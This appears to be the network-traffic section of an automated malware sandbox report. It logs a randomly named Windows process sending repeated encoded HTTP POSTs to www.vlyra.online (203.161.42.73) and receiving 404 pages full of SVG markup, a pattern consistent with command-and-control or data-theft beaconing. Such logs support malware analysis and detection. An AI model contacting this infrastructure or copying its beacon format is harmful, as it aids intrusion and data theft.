Aug 27, 2024 17:47:04.502994061 CEST	788	OUT	POST /evtw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vlyra.online Origin: http://www.vlyra.online Referer: http://www.vlyra.online/evtw/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 5a 4c 2b 73 41 33 4a 65 76 79 76 67 6f 78 66 49 36 51 62 73 44 34 56 59 30 5a 75 52 73 32 67 6e 6f 47 38 74 62 53 77 4e 69 44 64 53 72 4b 69 68 62 62 31 34 72 65 47 63 76 72 39 34 62 45 72 5a 53 32 6f 6c 59 7a 31 61 79 41 58 4d 6a 66 74 6c 48 56 57 66 74 6a 73 78 79 59 57 56 38 2f 66 79 57 67 71 65 41 45 38 7a 2f 77 73 41 6c 66 77 6c 67 51 39 77 47 57 7a 6e 73 6a 47 50 7a 59 79 58 6c 49 71 38 35 62 36 4b 34 4f 47 50 64 4b 6b 68 41 48 61 6e 50 54 2b 74 47 36 73 78 36 4f 54 4e 6e 36 36 51 37 74 74 57 46 31 4c 62 5a 31 2f 6f 79 4e 39 6c 59 67 3d 3d Data Ascii: AvLLLbOh=nOj0c4YacT1DZL+sA3JevyvgoxfI6QbsD4VY0ZuRs2gnoG8tbSwNiDdSrKihbb14reGcvr94bErZS2olYz1ayAXMjftlHVWftjsxyYWV8/fyWgqeAE8z/wsAlfwlgQ9wGWznsjGPzYyXlIq85b6K4OGPdKkhAHanPT+tG6sx6OTNn66Q7ttWF1LbZ1/oyN9lYg==
Aug 27, 2024 17:47:04.678139925 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:47:04 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:47:04.678248882 CEST	1289	IN	Data Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
Aug 27, 2024 17:47:04.678263903 CEST	1289	IN	Data Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
Aug 27, 2024 17:47:04.678479910 CEST	1289	IN	Data Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
Aug 27, 2024 17:47:04.678580999 CEST	1289	IN	Data Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
Aug 27, 2024 17:47:04.678716898 CEST	1289	IN	Data Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35 Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
Aug 27, 2024 17:47:04.678832054 CEST	1289	IN	Data Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
Aug 27, 2024 17:47:04.678900003 CEST	1289	IN	Data Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37 Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
Aug 27, 2024 17:47:04.678982973 CEST	1289	IN	Data Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
Aug 27, 2024 17:47:04.679176092 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
Aug 27, 2024 17:47:04.844007969 CEST	1289	IN	Data Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49813	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:07.204485893 CEST	1128	OUT	POST /evtw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vlyra.online Origin: http://www.vlyra.online Referer: http://www.vlyra.online/evtw/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 45 6e 72 6e 4d 74 61 51 55 4e 68 44 64 53 79 36 69 67 56 37 31 6e 72 65 4c 72 76 71 42 34 62 41 44 5a 44 56 67 6c 4d 54 31 64 71 77 58 4e 6b 66 73 69 57 46 57 76 74 69 51 48 79 61 71 56 39 50 7a 79 58 6c 65 65 4b 78 49 30 70 67 73 47 30 50 77 6d 31 67 39 58 47 57 2b 55 73 6e 43 31 7a 75 61 58 6c 72 53 38 72 4c 36 4c 74 4f 48 48 66 4b 6c 4d 52 69 79 75 45 52 65 36 41 39 55 34 31 72 47 30 6d 72 71 53 33 4f 52 62 54 46 71 67 56 30 79 2f 33 74 4d 64 4e 4d 4e 6c 43 5a 4e 45 32 32 63 4b 39 71 50 69 73 62 6b 4e 73 5a 39 62 77 6e 4c 51 4a 4d 32 4c 65 4e 63 34 53 31 55 2b 42 59 7a 4d 47 4c 53 32 72 38 47 6b 75 6d 68 43 30 52 58 6c 33 54 48 32 71 42 52 47 47 50 78 6e 66 35 2f 53 65 44 7a 53 6f 49 57 4e 38 35 57 34 4f 66 49 56 75 38 6f 56 61 74 33 6f 36 47 45 73 33 4f 53 56 71 64 65 72 35 37 77 55 4b 4c 58 69 2b 4c 4d 58 4d 6a 54 63 74 75 7a 42 37 6c 35 30 6d [TRUNCATED] Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFEnrnMtaQUNhDdSy6igV71nreLrvqB4bADZDVglMT1dqwXNkfsiWFWvtiQHyaqV9PzyXleeKxI0pgsG0Pwm1g9XGW+UsnC1zuaXlrS8rL6LtOHHfKlMRiyuERe6A9U41rG0mrqS3ORbTFqgV0y/3tMdNMNlCZNE22cK9qPisbkNsZ9bwnLQJM2LeNc4S1U+BYzMGLS2r8GkumhC0RXl3TH2qBRGGPxnf5/SeDzSoIWN85W4OfIVu8oVat3o6GEs3OSVqder57wUKLXi+LMXMjTctuzB7l50mJXpIPXx+NoPpdKKmYnXOzBHPFoIGPj7xkimuoHzUy7Ho3tFDeepRmSPuUpbt7VbKn8Ogd6bnOa0ndxaLQqBDmfVz/kEkyniNiupr6Ev8NZDMqL+Gd14NM+me2buDTZzNccPMjcbJixQN1oMSvPMRSPf02KJ56gOjfKJYZCIuORQ0k5+vmCh7VnBePXJEMhfVWqqaCXg9t/dlJg=
Aug 27, 2024 17:47:07.385747910 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:47:07 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:47:07.385869026 CEST	1289	IN	Data Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
Aug 27, 2024 17:47:07.385884047 CEST	1289	IN	Data Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
Aug 27, 2024 17:47:07.386014938 CEST	1289	IN	Data Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
Aug 27, 2024 17:47:07.386125088 CEST	1289	IN	Data Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
Aug 27, 2024 17:47:07.386140108 CEST	1289	IN	Data Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35 Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
Aug 27, 2024 17:47:07.386253119 CEST	1289	IN	Data Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
Aug 27, 2024 17:47:07.386360884 CEST	1289	IN	Data Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37 Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
Aug 27, 2024 17:47:07.386451006 CEST	1289	IN	Data Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
Aug 27, 2024 17:47:07.386574030 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
Aug 27, 2024 17:47:07.552975893 CEST	1289	IN	Data Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49814	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:09.920603991 CEST	3867	OUT	POST /evtw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vlyra.online Origin: http://www.vlyra.online Referer: http://www.vlyra.online/evtw/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 4d 6e 6f 56 45 74 62 77 6f 4e 67 44 64 53 74 4b 69 6c 56 37 31 75 72 65 44 76 76 71 4d 50 62 47 48 5a 41 43 73 6c 4e 67 52 64 34 67 58 4f 75 2f 74 6b 48 56 57 37 74 6a 74 4f 79 61 75 72 38 2f 48 79 57 6c 75 65 48 69 67 7a 71 77 73 41 30 50 77 36 6b 51 39 6c 47 57 71 45 73 6e 47 31 7a 6f 61 58 6a 4f 57 38 34 36 36 4c 31 75 48 47 4d 71 6c 50 4c 53 7a 63 45 52 4b 45 41 39 55 6f 31 75 6d 30 6d 6f 53 53 35 74 4a 55 53 6c 71 67 57 30 79 38 6b 34 55 5a 4e 4d 52 4c 43 59 70 45 32 78 67 4b 79 71 50 69 6d 5a 41 4f 38 70 39 64 30 6e 4c 44 66 38 4b 44 65 4e 49 47 53 77 6b 2b 41 6f 58 4d 46 63 2b 32 74 5a 71 6b 74 47 68 41 72 42 58 32 39 7a 47 70 71 42 41 74 47 4d 35 33 66 35 4c 53 64 6d 2f 53 73 74 69 4f 30 35 57 36 58 66 4a 58 34 38 6b 77 61 75 65 33 36 47 45 38 33 4c 71 56 71 4f 57 72 34 2f 6b 56 4b 62 58 6c 6e 37 4d 34 65 6a 66 57 74 75 76 5a 37 68 31 43 6d [TRUNCATED] Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFMnoVEtbwoNgDdStKilV71ureDvvqMPbGHZACslNgRd4gXOu/tkHVW7tjtOyaur8/HyWlueHigzqwsA0Pw6kQ9lGWqEsnG1zoaXjOW8466L1uHGMqlPLSzcERKEA9Uo1um0moSS5tJUSlqgW0y8k4UZNMRLCYpE2xgKyqPimZAO8p9d0nLDf8KDeNIGSwk+AoXMFc+2tZqktGhArBX29zGpqBAtGM53f5LSdm/SstiO05W6XfJX48kwaue36GE83LqVqOWr4/kVKbXln7M4ejfWtuvZ7h1CmKbpJvXxo+QAydKNkYmYTjABPF1pGO30yVOmvYXzWS7A4HtJI+eVAWSPuUllt7ZbLVsOx+ibifa0ldxULQqQDmj2z/8qky2/NgCpro8v7I1AJaL7Cd0wO8iIe332DSpjNt8PPisbNixTIVoLVvPWVSLD02+z57EejYWJL/rX1sRHjilSuWCuyVzGVvfqBqpDJi28QjbKhMWa+Jgw2RTwdk7+k0m//jzgiMBChTupM5EFhu2ZN3uCz4+h/bHYCg1M/7mPGS4K4gjReb47X3/b87yGAbFdoeGc2cxUOXh3fOdYB2RlU1z41UL1Vx3ND8iLiygI9GmRPgprqTVBJK9F6YSIOiraTKsth+HTkdApNXbQWYE97ZZyabIf9KXi9oC3Of/RMWwfoXQHJE6ep3wvIhwE2is1vyMbx85ZQyVkUgfUZqpV4/83D4tehYYrdwbEkSL9yMs5P9lEfI01f58rRkuN9ysBsejfXWI/UgEES0weXMW0hSCZbGSVlm9dRdb9dbGEj3Cmjk2frwGDFAhUnIgJSv2pvESWG0lnJyil3Z1bst92QQejLhnPAsWaTbEn4BALaUUHbWlMqQLBk6eo3trqGcAIlM1e576cM+3nVRh+cA52WBNad2r2J893wmMH+eVLXto/VqumPClAHla8p/XMwF+ot3fvoKm [TRUNCATED]
